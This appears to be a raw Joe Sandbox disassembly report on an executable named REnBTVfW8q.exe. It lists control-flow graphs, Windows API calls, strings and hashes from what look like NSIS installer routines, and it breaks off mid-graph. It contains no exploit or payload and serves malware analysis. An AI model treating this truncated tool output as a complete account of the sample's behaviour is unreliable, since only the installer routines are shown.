                                                                                              • Not Executed
                                                                                              control_flow_graph 607 406aba-406abf 608 406b30-406b4e 607->608 609 406ac1-406af0 607->609 610 407126-40713b 608->610 611 406af2-406af5 609->611 612 406af7-406afb 609->612 614 407155-40716b 610->614 615 40713d-407153 610->615 613 406b07-406b0a 611->613 616 406b03 612->616 617 406afd-406b01 612->617 619 406b28-406b2b 613->619 620 406b0c-406b15 613->620 618 40716e-407175 614->618 615->618 616->613 617->613 624 407177-40717b 618->624 625 40719c-4071a8 618->625 623 406cfd-406d1b 619->623 621 406b17 620->621 622 406b1a-406b26 620->622 621->622 627 406b90-406bbe 622->627 628 406d33-406d45 623->628 629 406d1d-406d31 623->629 630 407181-407199 624->630 631 40732a-407334 624->631 632 40693e-406947 625->632 633 406bc0-406bd8 627->633 634 406bda-406bf4 627->634 635 406d48-406d52 628->635 629->635 630->625 636 407340-407353 631->636 637 407355 632->637 638 40694d 632->638 639 406bf7-406c01 633->639 634->639 641 406d54 635->641 642 406cf5-406cfb 635->642 640 407358-40735c 636->640 637->640 645 406954-406958 638->645 646 406a94-406ab5 638->646 647 4069f9-4069fd 638->647 648 406a69-406a6d 638->648 650 406c07 639->650 651 406b78-406b7e 639->651 643 406cd0-406cd4 641->643 644 406e65-406e72 641->644 642->623 649 406c99-406ca3 642->649 659 406cda-406cf2 643->659 660 4072dc-4072e6 643->660 644->632 661 406ec1-406ed0 644->661 645->636 652 40695e-40696b 645->652 646->610 662 406a03-406a1c 647->662 663 4072a9-4072b3 647->663 653 406a73-406a87 648->653 654 4072b8-4072c2 648->654 655 4072e8-4072f2 649->655 656 406ca9-406ccb 649->656 669 4072c4-4072ce 650->669 670 406b5d-406b75 650->670 657 406c31-406c37 651->657 658 406b84-406b8a 651->658 652->637 667 406971-4069b7 652->667 671 406a8a-406a92 653->671 654->636 655->636 656->644 665 406c95 657->665 666 406c39-406c57 657->666 658->627 658->665 659->642 660->636 661->610 668 406a1f-406a23 662->668 663->636 665->649 672 406c59-406c6d 666->672 673 406c6f-406c81 666->673 674 4069b9-4069bd 667->674 675 4069df-4069e1 667->675 668->647 676 406a25-406a2b 668->676 669->636 670->651 671->646 671->648 677 406c84-406c8e 672->677 673->677 678 4069c8-4069d6 GlobalAlloc 674->678 679 4069bf-4069c2 GlobalFree 674->679 680 4069e3-4069ed 675->680 681 4069ef-4069f7 675->681 682 406a55-406a67 676->682 683 406a2d-406a34 676->683 677->657 686 406c90 677->686 678->637 687 4069dc 678->687 679->678 680->680 680->681 681->668 682->671 684 406a36-406a39 GlobalFree 683->684 685 406a3f-406a4f GlobalAlloc 683->685 684->685 685->637 685->682 689 4072d0-4072da 686->689 690 406c16-406c2e 686->690 687->675 689->636 690->657
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                              • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                                                              • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                                                              • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 731 4066f3-406707 FindFirstFileW 732 406714 731->732 733 406709-406712 FindClose 731->733 734 406716-406717 732->734 733->734
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 004066FE
                                                                                              • FindClose.KERNEL32(00000000), ref: 0040670A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID: xgB
                                                                                              • API String ID: 2295610775-399326502
                                                                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                              • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                              • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 20c39e142c52789c8eef78f40019c13669666e558b86cb1136619f829f09591b
                                                                                              • Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
                                                                                              • Opcode Fuzzy Hash: 20c39e142c52789c8eef78f40019c13669666e558b86cb1136619f829f09591b
                                                                                              • Instruction Fuzzy Hash: 38F05E71A04104ABD710EBA4DA499ADB368EF00314F2005BBF541F21D1D7B84D919B2A

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 188 403e6c-403e7e 189 403e84-403e8a 188->189 190 403fbf-403fce 188->190 189->190 191 403e90-403e99 189->191 192 403fd0-404018 GetDlgItem * 2 call 404345 SetClassLongW call 40140b 190->192 193 40401d-404032 190->193 194 403e9b-403ea8 SetWindowPos 191->194 195 403eae-403eb1 191->195 192->193 197 404072-404077 call 404391 193->197 198 404034-404037 193->198 194->195 199 403eb3-403ec5 ShowWindow 195->199 200 403ecb-403ed1 195->200 205 40407c-404097 197->205 202 404039-404044 call 401389 198->202 203 40406a-40406c 198->203 199->200 206 403ed3-403ee8 DestroyWindow 200->206 207 403eed-403ef0 200->207 202->203 225 404046-404065 SendMessageW 202->225 203->197 210 404312 203->210 211 4040a0-4040a6 205->211 212 404099-40409b call 40140b 205->212 213 4042ef-4042f5 206->213 216 403ef2-403efe SetWindowLongW 207->216 217 403f03-403f09 207->217 215 404314-40431b 210->215 221 4042d0-4042e9 DestroyWindow KiUserCallbackDispatcher 211->221 222 4040ac-4040b7 211->222 212->211 213->210 220 4042f7-4042fd 213->220 216->215 223 403fac-403fba call 4043ac 217->223 224 403f0f-403f20 GetDlgItem 217->224 220->210 226 4042ff-404308 ShowWindow 220->226 221->213 222->221 227 4040bd-40410a call 4063d2 call 404345 * 3 GetDlgItem 222->227 223->215 228 403f22-403f39 SendMessageW IsWindowEnabled 224->228 229 403f3f-403f42 224->229 225->215 226->210 258 404114-404150 ShowWindow KiUserCallbackDispatcher call 404367 EnableWindow 227->258 259 40410c-404111 227->259 228->210 228->229 233 403f44-403f45 229->233 234 403f47-403f4a 229->234 236 403f75-403f7a call 40431e 233->236 237 403f58-403f5d 234->237 238 403f4c-403f52 234->238 236->223 239 403f93-403fa6 SendMessageW 237->239 240 403f5f-403f65 237->240 238->239 243 403f54-403f56 238->243 239->223 244 403f67-403f6d call 40140b 240->244 245 403f7c-403f85 call 40140b 240->245 243->236 254 403f73 244->254 245->223 255 403f87-403f91 245->255 254->236 255->254 262 404152-404153 258->262 263 404155 258->263 259->258 264 404157-404185 GetSystemMenu EnableMenuItem SendMessageW 262->264 263->264 265 404187-404198 SendMessageW 264->265 266 40419a 264->266 267 4041a0-4041df call 40437a call 403e4d call 4063b0 lstrlenW call 4063d2 SetWindowTextW call 401389 265->267 266->267 267->205 278 4041e5-4041e7 267->278 278->205 279 4041ed-4041f1 278->279 280 404210-404224 DestroyWindow 279->280 281 4041f3-4041f9 279->281 280->213 283 40422a-404257 CreateDialogParamW 280->283 281->210 282 4041ff-404205 281->282 282->205 284 40420b 282->284 283->213 285 40425d-4042b4 call 404345 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 283->285 284->210 285->210 290 4042b6-4042c9 ShowWindow call 404391 285->290 292 4042ce 290->292 292->213
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EA8
                                                                                              • ShowWindow.USER32(?), ref: 00403EC5
                                                                                              • DestroyWindow.USER32 ref: 00403ED9
                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403EF5
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F16
                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F2A
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F31
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FDF
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403FE9
                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00404003
                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00404054
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 004040FA
                                                                                              • ShowWindow.USER32(00000000,?), ref: 0040411B
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040412D
                                                                                              • EnableWindow.USER32(?,?), ref: 00404148
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040415E
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404165
                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040417D
                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404190
                                                                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041BA
                                                                                              • SetWindowTextW.USER32(?,00423728), ref: 004041CE
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404302
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                              • String ID: (7B
                                                                                              • API String ID: 3282139019-3251261122
                                                                                              • Opcode ID: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                              • Instruction ID: 85a8b1cb5875a9f0130709c86f20b78f231723f1bf47f2e7597622744019d293
                                                                                              • Opcode Fuzzy Hash: a59e4a4ec43d7d40c0b393105adb60ca25607e9856a65bb271622870994d4568
                                                                                              • Instruction Fuzzy Hash: 88C1A1B1640200FFDB216F61EE85D2B3BA8EB95305F40053EFA41B21F0CB7959529B6E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 293 403abe-403ad6 call 40678a 296 403ad8-403ae3 GetUserDefaultUILanguage call 4062f7 293->296 297 403aea-403b21 call 40627e 293->297 300 403ae8 296->300 303 403b23-403b34 call 40627e 297->303 304 403b39-403b3f lstrcatW 297->304 302 403b44-403b6d call 403d94 call 405d89 300->302 310 403b73-403b78 302->310 311 403bff-403c07 call 405d89 302->311 303->304 304->302 310->311 312 403b7e-403ba6 call 40627e 310->312 317 403c15-403c3a LoadImageW 311->317 318 403c09-403c10 call 4063d2 311->318 312->311 319 403ba8-403bac 312->319 321 403cbb-403cc3 call 40140b 317->321 322 403c3c-403c6c RegisterClassW 317->322 318->317 324 403bbe-403bca lstrlenW 319->324 325 403bae-403bbb call 405cae 319->325 334 403cc5-403cc8 321->334 335 403ccd-403cd8 call 403d94 321->335 326 403c72-403cb6 SystemParametersInfoW CreateWindowExW 322->326 327 403d8a 322->327 331 403bf2-403bfa call 405c81 call 4063b0 324->331 332 403bcc-403bda lstrcmpiW 324->332 325->324 326->321 330 403d8c-403d93 327->330 331->311 332->331 333 403bdc-403be6 GetFileAttributesW 332->333 338 403be8-403bea 333->338 339 403bec-403bed call 405ccd 333->339 334->330 345 403d61-403d62 call 4054e7 335->345 346 403cde-403cf8 ShowWindow call 40671a 335->346 338->331 338->339 339->331 349 403d67-403d69 345->349 353 403d04-403d16 GetClassInfoW 346->353 354 403cfa-403cff call 40671a 346->354 351 403d83-403d85 call 40140b 349->351 352 403d6b-403d71 349->352 351->327 352->334 355 403d77-403d7e call 40140b 352->355 358 403d18-403d28 GetClassInfoW RegisterClassW 353->358 359 403d2e-403d51 DialogBoxParamW call 40140b 353->359 354->353 355->334 358->359 362 403d56-403d5f call 403a0e 359->362 362->330
                                                                                              APIs
                                                                                                • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                              • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000), ref: 00403AD8
                                                                                                • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000), ref: 00403B3F
                                                                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BDD
                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles), ref: 00403C26
                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                                                              • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                                                              • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                              • API String ID: 606308-65220574
                                                                                              • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                              • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                                                              • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                                                              • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 366 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 369 402f64-402f69 366->369 370 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 366->370 371 4031b3-4031b7 369->371 378 402fa2-402fb9 370->378 379 40308c-40309a call 402e72 370->379 381 402fbb 378->381 382 402fbd-402fca call 40342b 378->382 385 4030a0-4030a3 379->385 386 40316b-403170 379->386 381->382 388 402fd0-402fd6 382->388 389 403127-40312f call 402e72 382->389 390 4030a5-4030bd call 403441 call 40342b 385->390 391 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 385->391 386->371 392 403056-40305a 388->392 393 402fd8-402ff0 call 405e5d 388->393 389->386 390->386 418 4030c3-4030c9 390->418 416 403131-403161 call 403441 call 4031ba 391->416 417 40311d-403122 391->417 401 403063-403069 392->401 402 40305c-403062 call 402e72 392->402 393->401 411 402ff2-402ff9 393->411 403 40306b-403079 call 40687d 401->403 404 40307c-403086 401->404 402->401 403->404 404->378 404->379 411->401 415 402ffb-403002 411->415 415->401 419 403004-40300b 415->419 426 403166-403169 416->426 417->371 418->386 418->391 419->401 421 40300d-403014 419->421 421->401 423 403016-403036 421->423 423->386 425 40303c-403040 423->425 427 403042-403046 425->427 428 403048-403050 425->428 426->386 429 403172-403183 426->429 427->379 427->428 428->401 432 403052-403054 428->432 430 403185 429->430 431 40318b-403190 429->431 430->431 433 403191-403197 431->433 432->401 433->433 434 403199-4031b1 call 405e5d 433->434 434->371
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402F28
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F44
                                                                                                • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,00438800,80000000,00000003), ref: 00405EA6
                                                                                                • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405EC8
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003), ref: 00402F8D
                                                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                                                              Strings
                                                                                              • Null, xrefs: 0040300D
                                                                                              • C:\Users\user\Desktop, xrefs: 00402F6F, 00402F74, 00402F7A
                                                                                              • Inst, xrefs: 00402FFB
                                                                                              • Error launching installer, xrefs: 00402F64
                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040316B
                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311D
                                                                                              • soft, xrefs: 00403004
                                                                                              • "C:\Users\user\Desktop\REnBTVfW8q.exe", xrefs: 00402F14
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402F21, 004030EC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                              • String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                              • API String ID: 2803837635-489658147
                                                                                              • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                              • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                                                              • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                                                              • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 437 4063d2-4063dd 438 4063f0-406406 437->438 439 4063df-4063ee 437->439 440 40640c-406419 438->440 441 40661e-406624 438->441 439->438 440->441 444 40641f-406426 440->444 442 40662a-406635 441->442 443 40642b-406438 441->443 445 406640-406641 442->445 446 406637-40663b call 4063b0 442->446 443->442 447 40643e-40644a 443->447 444->441 446->445 448 406450-40648e 447->448 449 40660b 447->449 451 406494-40649f 448->451 452 4065ae-4065b2 448->452 453 406619-40661c 449->453 454 40660d-406617 449->454 455 4064a1-4064a6 451->455 456 4064b8 451->456 457 4065b4-4065ba 452->457 458 4065e5-4065e9 452->458 453->441 454->441 455->456 459 4064a8-4064ab 455->459 462 4064bf-4064c6 456->462 460 4065ca-4065d6 call 4063b0 457->460 461 4065bc-4065c8 call 4062f7 457->461 463 4065f8-406609 lstrlenW 458->463 464 4065eb-4065f3 call 4063d2 458->464 459->456 465 4064ad-4064b0 459->465 475 4065db-4065e1 460->475 461->475 467 4064c8-4064ca 462->467 468 4064cb-4064cd 462->468 463->441 464->463 465->456 471 4064b2-4064b6 465->471 467->468 473 406508-40650b 468->473 474 4064cf-4064ed call 40627e 468->474 471->462 476 40651b-40651e 473->476 477 40650d-406519 GetSystemDirectoryW 473->477 483 4064f2-4064f6 474->483 475->463 479 4065e3 475->479 481 406520-40652e GetWindowsDirectoryW 476->481 482 406589-40658b 476->482 480 40658d-406591 477->480 484 4065a6-4065ac call 406644 479->484 480->484 489 406593 480->489 481->482 482->480 486 406530-40653a 482->486 487 406596-406599 483->487 488 4064fc-406503 call 4063d2 483->488 484->463 492 